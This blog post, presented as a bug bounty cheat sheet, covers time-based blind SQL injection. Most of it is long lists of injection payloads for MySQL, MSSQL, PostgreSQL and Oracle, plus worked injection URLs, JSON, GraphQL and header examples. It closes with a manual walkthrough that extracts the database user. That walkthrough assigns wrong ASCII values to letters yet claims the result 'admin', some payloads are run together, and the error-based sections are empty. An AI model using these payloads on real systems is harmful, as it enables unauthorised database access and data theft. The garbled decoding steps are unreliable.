Ansar Uddin
14 min readDec 30, 2020

Blind SQL Injection Detection and Exploitation (Cheat Sheet)

Hi everyone,

This is Ansar Uddin and I am a Cyber Security Researcher from Bangladesh.

This Is My First Bug Bounty Write-up.

Today’s topic is all about Blind SQL injection detection and exploitation.

  • Time-based Blind SQLi : Time-based SQL Injection is an inferential SQL Injection technique that relies on sending an SQL query to the database which forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE. epending on the result, an HTTP response will be returned with a delay, or returned immediately. This allows an attacker to infer if the payload used returned true or false, even though no data from the database is returned.

HUNT for Blind Sql Injection:

Time Based (GET,POST,PUT)

Apply on:

Search
First name, last name, number, any kind of date, Email or Password (register, login, reset password)
Any kind of Product,menu,keyword,payment
Cookie,User agent,Referer,X-Forwarded-For

Parameter list (regular):

id
cid
pid
page
search
username
name
register
first name
last name
email
pass
password
dir
category
class
register
file
news
item
menu
lang
name
ref
title
time
view
topic
thread
type
date
form
join
main
nav
region
select
report
role
update
query
user
sort
where
params
process
row
table
from
results
sleep
fetch
order
keyword
column
field
delete
string
number
filter

Payload list:

MySQL Blind (Time Based):

0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z
if(now()=sysdate(),sleep(5),0)
'XOR(if(now()=sysdate(),sleep(5),0))XOR'
'XOR(if(now()=sysdate(),sleep(5*1),0))OR'
0'|(IF((now())LIKE(sysdate()),SLEEP(1),0))|'Z
0'or(now()=sysdate()&&SLEEP(1))or'Z
if(now()=sysdate(),sleep(5),0)/"XOR(if(now()=sysdate(),sleep(5),0))OR"/if(now()=sysdate(),sleep(5),0)/*'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0))OR"*/if(now()=sysdate(),sleep(5),0)/'XOR(if(now()=sysdate(),sleep(5),0))OR'"XOR(if(now()=sysdate(),sleep(5),0) and 5=5)"/if(1=1,sleep(5),0)/*'XOR(if(1=1,sleep(5),0))OR'"XOR(if(1=1,sleep(5),0))OR"*/if(1337=1337,exp(~(1)),0)/*'XOR(if(1337=1337,exp(~(1)),0))OR'"XOR(if(1337=1337,sleep(5),0))OR"*/SLEEP(5)/*' or SLEEP(5) or '" or SLEEP(5) or "*/%2c(select%5*%5from%5(select(sleep(5)))a)
(select(0)from(select(sleep(5)))v)
(SELECT SLEEP(5))
'%2b(select*from(select(sleep(5)))a)%2b'
(select*from(select(sleep(5)))a)
1'%2b(select*from(select(sleep(5)))a)%2b'
,(select * from (select(sleep(5)))a)
desc%2c(select*from(select(sleep(5)))a)
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))
-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(5))A))
(SELECT * FROM (SELECT(SLEEP(5)))YYYY)(SELECT * FROM (SELECT(SLEEP(5)))YYYY)#(SELECT * FROM (SELECT(SLEEP(5)))YYYY)--'+(select*from(select(sleep(5)))a)+'(select(0)from(select(sleep(5)))v)%2f'+(select(0)from(select(sleep(5)))v)+'"(select(0)from(select(sleep(5)))v)%2f*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*%2f(select(0)from(select(sleep(5)))v)/*'+(select(0)from(select(sleep(5)))v)+'"+(select(0)from(select(sleep(5)))v)+"*/(select(0)from(select(sleep(5)))v)/*'+(select(0)from(select(sleep(5)))v)+'\"+(select(0)from(select(sleep(5)))v)+\"*/',''),/*test*/%26%26%09sLeEp(5)%09--+AND BLIND:1 and sleep 5--
1 and sleep 5
1 and sleep(5)--
1 and sleep(5)
' and sleep 5--
' and sleep 5
' and sleep 5 and '1'='1
' and sleep(5) and '1'='1
' and sleep(5)--
' and sleep(5)
' AnD SLEEP(5) ANd '1
and sleep 5--
and sleep 5
and sleep(5)--
and sleep(5)
and SELECT SLEEP(5); #
AnD SLEEP(5)
AnD SLEEP(5)--
AnD SLEEP(5)#
' AND SLEEP(5)#
" AND SLEEP(5)#
') AND SLEEP(5)#
OR BLIND:or sleep 5--
or sleep 5
or sleep(5)--
or sleep(5)
or SELECT SLEEP(5); #
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
' OR SLEEP(5)#
" OR SLEEP(5)#
') OR SLEEP(5)#
')) or sleep(5)='
" or sleep(5)#
1) or sleep(5)#
)) or sleep(5)='
1)) or sleep(5)#
or sleep(5)#
%20'sleep%2050'
%20$(sleep%2050)
")) or sleep(5)="
or sleep(5)='
") or sleep(5)="
) or sleep(5)='
1 or sleep(5)#

You can replace AND / OR
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337'='1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ('PBiy'='PBiy
) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (1337=1337
)) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((1337=1337
))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (((1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)# 1337
) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
1 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
+(SELECT 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))+
)) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
` WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
`) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
`=`1` AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY))|[1
') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ('1337'='1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (('1337'='1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((('1337'='1337
' AND (SELECT 3122 FROM (SELECT(SLEEP(5)))YYYY) AND '1337'='1337
') AND (SELECT 4796 FROM (SELECT(SLEEP(5)))YYYY) AND ('1337'='1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (('1337' LIKE '1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((('1337' LIKE '1337
%' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337%'='1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND '1337' LIKE '1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ("1337"="1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (("1337"="1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((("1337"="1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND "1337"="1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ("1337" LIKE "1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (("1337" LIKE "1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND ((("1337" LIKE "1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND "1337" LIKE "1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR '1337'='1337
') WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
") WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
RLIKE BLIND:You can replace AND / ORRLIKE SLEEP(5)--
' RLIKE SLEEP(5)--
' RLIKE SLEEP(5)-- 1337
" RLIKE SLEEP(5)-- 1337
') RLIKE SLEEP(5)-- 1337
') RLIKE SLEEP(5) AND ('1337'='1337
')) RLIKE SLEEP(5) AND (('1337'='1337
'))) RLIKE SLEEP(5) AND ((('1337'='1337
) RLIKE SLEEP(5)-- 1337
) RLIKE SLEEP(5) AND (1337=1337
)) RLIKE SLEEP(5) AND ((1337=1337
))) RLIKE SLEEP(5) AND (((1337=1337
1 RLIKE SLEEP(5)
1 RLIKE SLEEP(5)-- 1337
1 RLIKE SLEEP(5)# 1337
) WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
1 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
+(SELECT 1337 WHERE 1337=1337 RLIKE SLEEP(5))+
)) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
) AS 1337 WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
` WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
`) WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
' RLIKE SLEEP(5) AND '1337'='1337
') RLIKE SLEEP(5) AND ('1337' LIKE '1337
')) RLIKE SLEEP(5) AND (('1337' LIKE '1337
'))) RLIKE SLEEP(5) AND ((('1337' LIKE '1337
%' RLIKE SLEEP(5) AND '1337%'='1337
' RLIKE SLEEP(5) AND '1337' LIKE '1337
") RLIKE SLEEP(5) AND ("1337"="1337
")) RLIKE SLEEP(5) AND (("1337"="1337
"))) RLIKE SLEEP(5) AND ((("1337"="1337
" RLIKE SLEEP(5) AND "1337"="1337
") RLIKE SLEEP(5) AND ("1337" LIKE "1337
")) RLIKE SLEEP(5) AND (("1337" LIKE "1337
"))) RLIKE SLEEP(5) AND ((("1337" LIKE "1337
" RLIKE SLEEP(5) AND "1337" LIKE "1337
' RLIKE SLEEP(5) OR '1337'='1337
') WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
") WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
' WHERE 1337=1337 RLIKE SLEEP(5)-- 1337
" WHERE 1337=1337 RLIKE SLEEP(5)-- 1337

ELT Blind:
You can replace AND / OR' AND ELT(1337=1337,SLEEP(5))--
' AND ELT(1337=1337,SLEEP(5))-- 1337
" AND ELT(1337=1337,SLEEP(5))-- 1337
') AND ELT(1337=1337,SLEEP(5))-- 1337
') AND ELT(1337=1337,SLEEP(5)) AND ('1337'='1337
')) AND ELT(1337=1337,SLEEP(5)) AND (('1337'='1337
'))) AND ELT(1337=1337,SLEEP(5)) AND ((('1337'='1337
' AND ELT(1337=1337,SLEEP(5)) AND '1337'='1337
') AND ELT(1337=1337,SLEEP(5)) AND ('1337' LIKE '1337
')) AND ELT(1337=1337,SLEEP(5)) AND (('1337' LIKE '1337
'))) AND ELT(1337=1337,SLEEP(5)) AND ((('1337' LIKE '1337
) AND ELT(1337=1337,SLEEP(5))-- 1337
) AND ELT(1337=1337,SLEEP(5)) AND (1337=1337
)) AND ELT(1337=1337,SLEEP(5)) AND ((1337=1337
))) AND ELT(1337=1337,SLEEP(5)) AND (((1337=1337
1 AND ELT(1337=1337,SLEEP(5))
1 AND ELT(1337=1337,SLEEP(5))-- 1337
1 AND ELT(1337=1337,SLEEP(5))# 1337
) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
1 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
+(SELECT 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+
)) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
` WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
`) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
1`=`1` AND ELT(1337=1337,SLEEP(5)) AND `1`=`1
]-(SELECT 0 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))|[1
%' AND ELT(1337=1337,SLEEP(5)) AND '1337%'='1337
' AND ELT(1337=1337,SLEEP(5)) AND '1337' LIKE '1337
") AND ELT(1337=1337,SLEEP(5)) AND ("1337"="1337
")) AND ELT(1337=1337,SLEEP(5)) AND (("1337"="1337
"))) AND ELT(1337=1337,SLEEP(5)) AND ((("1337"="1337
" AND ELT(1337=1337,SLEEP(5)) AND "1337"="1337
") AND ELT(1337=1337,SLEEP(5)) AND ("1337" LIKE "1337
")) AND ELT(1337=1337,SLEEP(5)) AND (("1337" LIKE "1337
"))) AND ELT(1337=1337,SLEEP(5)) AND ((("1337" LIKE "1337
" AND ELT(1337=1337,SLEEP(5)) AND "1337" LIKE "1337
' AND ELT(1337=1337,SLEEP(5)) OR '1337'='FMTE
') WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
") WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
' WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
" WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
'||(SELECT 0x4c454f67 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||'
'||(SELECT 0x727a5277 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||'
'+(SELECT 0x4b6b486c WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+'
||(SELECT 0x57556971 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||
||(SELECT 0x67664847 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))||
+(SELECT 0x74764164 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+
')) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
")) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
') AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337
") AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337

BENCHMARK:
You can replace AND / OR' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))--
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
" AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND =BENCHMARK(5000000,MD5(0x774c5341))--
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337'='1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337'='1337
'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337'='1337
') AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337' LIKE '1337
')) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337' LIKE '1337
'))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((('1337' LIKE '1337
%' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337%'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337' LIKE '1337
") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337"="1337
")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337"="1337
"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337"="1337
" AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND "1337"="1337
") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ("1337" LIKE "1337
")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (("1337" LIKE "1337
"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ((("1337" LIKE "1337
" AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND "1337" LIKE "1337
' AND 1337=BENCHMARK(5000000,MD5(0x576e7a57)) AND '1337'='1337

Microsoft SQL Server Blind (Time Based):

;waitfor delay '0:0:5'--
';WAITFOR DELAY '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
'));waitfor delay '0:0:5'--
"));waitfor delay '0:0:5'--
") IF (1=1) WAITFOR DELAY '0:0:5'--
';%5waitfor%5delay%5'0:0:5'%5--%5
' WAITFOR DELAY '0:0:5'--
' WAITFOR DELAY '0:0:5'
or WAITFOR DELAY '0:0:5'--
or WAITFOR DELAY '0:0:5'
and WAITFOR DELAY '0:0:5'--
and WAITFOR DELAY '0:0:5'
WAITFOR DELAY '0:0:5'
;WAITFOR DELAY '0:0:5'--
;WAITFOR DELAY '0:0:5'
1 WAITFOR DELAY '0:0:5'--
1 WAITFOR DELAY '0:0:5'
1 WAITFOR DELAY '0:0:5'-- 1337
1' WAITFOR DELAY '0:0:5' AND '1337'='1337
1') WAITFOR DELAY '0:0:5' AND ('1337'='1337
1) WAITFOR DELAY '0:0:5' AND (1337=1337
') WAITFOR DELAY '0:0:5'--
" WAITFOR DELAY '0:0:5'--
')) WAITFOR DELAY '0:0:5'--
'))) WAITFOR DELAY '0:0:5'--
%' WAITFOR DELAY '0:0:5'--
") WAITFOR DELAY '0:0:5'--
")) WAITFOR DELAY '0:0:5'--
"))) WAITFOR DELAY '0:0:5'--
1 waitfor delay '0:0:5'--
1' waitfor delay '0:0:5'--

Postgresql Blind (Time Based):

";SELECT pg_sleep(5);
;SELECT pg_sleep(5);
and SELECT pg_sleep(5);
1 SELECT pg_sleep(5);
or SELECT pg_sleep(5);
(SELECT pg_sleep(5))
pg_sleep(5)--
1 or pg_sleep(5)--
" or pg_sleep(5)--
' or pg_sleep(5)--
1) or pg_sleep(5)--
") or pg_sleep(5)--
') or pg_sleep(5)--
1)) or pg_sleep(5)--
")) or pg_sleep(5)--
')) or pg_sleep(5)--
pg_SLEEP(5)
pg_SLEEP(5)--
pg_SLEEP(5)#
or pg_SLEEP(5)
or pg_SLEEP(5)--
or pg_SLEEP(5)#
' SELECT pg_sleep(5);
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(5))
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(5))-- 1337
1' AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND '1337'='1337
1') AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND ('1337'='1337
1) AND 1337=(SELECT 1337 FROM PG_SLEEP(5)) AND (1337=1337
or pg_sleep(5)--
) or pg_sleep(5)--
)) or pg_sleep(5)--

Oracle Blind (Time Based):

You can replace AND / OR

1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5)1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5)-- 1337' AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND '1337'='1337') AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND ('1337'='1337) AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND (1337=1337

Generic Time Based SQL Injection Payloads:

sleep(5)#
(sleep 5)--
(sleep 5)
(sleep(5))--
(sleep(5))
-sleep(5)
SLEEP(5)#
SLEEP(5)--
SLEEP(5)="
SLEEP(5)='
";sleep 5--
";sleep 5
";sleep(5)--
";sleep(5)
";SELECT SLEEP(5); #
1 SELECT SLEEP(5); #
+ SLEEP(5) + '
&&SLEEP(5)
&&SLEEP(5)--
&&SLEEP(5)#
;sleep 5--
;sleep 5
;sleep(5)--
;sleep(5)
;SELECT SLEEP(5); #
'&&SLEEP(5)&&'1
' SELECT SLEEP(5); #
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))--
or benchmark(50000000,MD5(1))#
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)--
ORDER BY SLEEP(5)#
AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
OR (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337
RANDOMBLOB(500000000/2)
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
RANDOMBLOB(1000000000/2)
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))

If response delay between 5 to 7 Seconds .
It means vulnerable.

Detection and exploitation:

1.=payload

Example:

=0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z=(select(0)from(select(sleep(5)))v)email=test@gmail.com' WAITFOR DELAY '0:0:5'--email=test@gmail.com'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z

2.=value payload

Example:

=1 AND (SELECT * FROM (SELECT(SLEEP(5)))YYYY) AND '%'='=1'XOR(if(now()=sysdate(),sleep(5),0))OR'=1 AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337

=1 or sleep(5)#

Mysql blind sql injection (time based):

email=test@gmail.com'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z

MSSQL blind Sql injection (time based):

email=test@gmail.com' WAITFOR DELAY '0:0:5'--

3.https://redact.com/page/payload
https://redact.com/page/value payload

Example:

https://redact.com/page/if(now()=sysdate(),sleep(3),0)/"XOR(if(now()=sysdate(),sleep(3),0))OR"/https://redact.com/(select(0)from(select(sleep(5)))v)%2f'+(select(0)from(select(sleep(5)))v)+'"https://redact.com/page/1 AnD SLEEP(5)https://redact.com/page/1' ORDER BY SLEEP(5)

4.Blind Sql injection in json:

{payload}

[payload]

{value payload}

Example:

[-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))]{AnD SLEEP(5)}{1 AnD SLEEP(5)}{1' AnD SLEEP(5)--}{sleep 5}"emails":["AnD SLEEP(5)"]"emails":["test@gmail.com' OR SLEEP(5)#"]{"options":{"id":[],"emails":["AnD SLEEP(5)"],

5.Blind Sql injection in Graphql:

{“operationName”:”pages”,”variables”:{“offset”:0,”limit”:10,”sortc”:”name Payload”,”sortrev”:false},”query”:”query pages($offset: Int!, $limit: Int!, $sortc: String, $sortrev: Boolean) {\n pages(offset: $offset, limit: $limit, sortc: $sortColumn, sortReverse: $sortReverse) {\n id\n n\n __typen\n }\n me {\n firstN\n lastN\n usern\n __typen\n }\n components {\n title\n __typen\n }\n templates {\n title\n __typen\n }\n fonts {\n n\n __typen\n }\n partners {\n id\n n\n banners {\n n\n __typen\n }\n __typen\n }\n}\n”}

Example:

{"operationName":"pages","variables":{"offset":0,"limit":10,"sortc":"name AND sleep(5)","sortrev":false},"query":"query pages($offset: Int!, $limit: Int!, $sortc: String, $sortrev: Boolean) {\n pages(offset: $offset, limit: $limit, sortc: $sortColumn, sortReverse: $sortReverse) {\n id\n n\n __typen\n }\n me {\n firstN\n lastN\n usern\n __typen\n }\n components {\n title\n __typen\n }\n templates {\n title\n __typen\n }\n fonts {\n n\n __typen\n }\n partners {\n id\n n\n banners {\n n\n __typen\n }\n __typen\n }\n}\n"}

6.Http header based (Error based,Time Based):

Referer: https://https://redact.com/408685756payload

Cookie: _gcl_au=1.1.2127391584.1587087463paylaod

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87Payload

or

Referer: https://https://redact.com/408685756 payload

Cookie: _gcl_au=1.1.2127391584.1587087463 paylaod

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Payload

X-Forwarded-For: paylaod

Mysql Error Based:

Mysql Error Based

Mssql Error Based:

Mssql Error Based

7.Blind Sql injection exploitation (Manual):

MySql Time Based:RESULTING QUERY (WITH MALICIOUS SLEEP INJECTED).SELECT * FROM products WHERE id=1-SLEEP(5)RESULTING QUERY (WITH MALICIOUS BENCHMARK INJECTED).SELECT * FROM products WHERE id=1-BENCHMARK(100000000, rand())RESULTING QUERY - TIME-BASED ATTACK TO VERIFY DATABASE VERSION.SELECT * FROM products WHERE id=1-IF(MID(VERSION(),1,1) = '5', SLEEP(5), 0)Time Based Sqli:1 and (select sleep(5) from users where SUBSTR(table_name,1,1) = 'A')#Error Blind SQLi:
AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -
Ultimate Sql injection Payload:
SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"
Exploitation:
redact.com/page/search?q=1 and sleep(5)--
Current user:redact.com/page/search?q=1 and if(substring(user(),1,1)='a',SLEEP(5),1)--redact.com/page/search?q=1 and if(substring(user(),2,1)='a',SLEEP(5),1)--redact.com/page/search?q=1 and if(substring(user(),3,1)='a',SLEEP(5),1)--Table_name guessing:redact.com/page/search?q=1 and IF(SUBSTRING((select 1 from [guess_your_table_name] limit 0,1),1,1)=1,SLEEP(5),1)redact.com/page/search?q=1 and IF(SUBSTRING((select substring(concat(1,[guess_your_column_name]),1,1) from [existing_table_name] limit 0,1),1,1)=1,SLEEP(5),1)redact.com/page/search?q=1 and if((select mid(column_name,1,1) from table_name limit 0,1)='a',sleep(5),1)--
Mssql Time Based:
RESULTING QUERY (WITH MALICIOUS SLEEP INJECTED).SELECT * FROM products WHERE id=1; WAIT FOR DELAY '00:00:5'RESULTING QUERY (VERIFY IF USER IS SA).SELECT * FROM products WHERE id=1; IF SYSTEM_USER='sa' WAIT FOR DELAY '00:00:5'Exploitation:
http://redact.com/page.aspx?id=1
; WAITFOR DELAY '00:00:5'-- (+5 seconds)
TIME-BASED Extraction of CURRENT DATABASE USER
Determine Length of USER:
http://redact.com/page.aspx?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:5'--
http://redact.com/page.aspx?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:5'--
http://redact.com/page.aspx?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:5'--
http://redact.com/page.aspx?id=1; IF (LEN(USER)=4) WAITFOR DELAY '00:00:5'--
http://redact.com/page.aspx?id=1; IF (LEN(USER)=5) WAITFOR DELAY '00:00:5'-- (+5 seconds)
Result = 5 characters in length
Determine length, and then try to find out CHAR value one character position at a time, like this:
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))>96) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))>50) WAITFOR DELAY '00:00:5'--
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))>98) WAITFOR DELAY '00:00:5'--
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1))=97) WAITFOR DELAY '00:00:5'-- (+5 seconds)
Result = the first character CHAR value is 97 which is an "a"
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),2,1)))>99) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),2,1)))=50) WAITFOR DELAY '00:00:5'-- (+5 seconds)
Result = the second character CHAR value is 50 which is a "d"
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),3,1)))>58) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),3,1)))=59) WAITFOR DELAY '00:00:5'—
Result = third character CHAR value is 59 which is the letter "m"
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),4,1)))>54) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),4,1)))=55) WAITFOR DELAY '00:00:5'-- (+5 seconds)
Result = the fourth character CHAR value is 55 which is an "i"
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),5,1)))>59) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),5,1)))=15) WAITFOR DELAY '00:00:5'-- (+5 seconds)
the fifth character position has CHAR value of 15 which is the letter "n"
Database User = 97,50,59,55,15 = adminTIME-BASED Extraction of 1st TABLE COLUMNS:
let’s enumerate some columns from the table(s) we found:
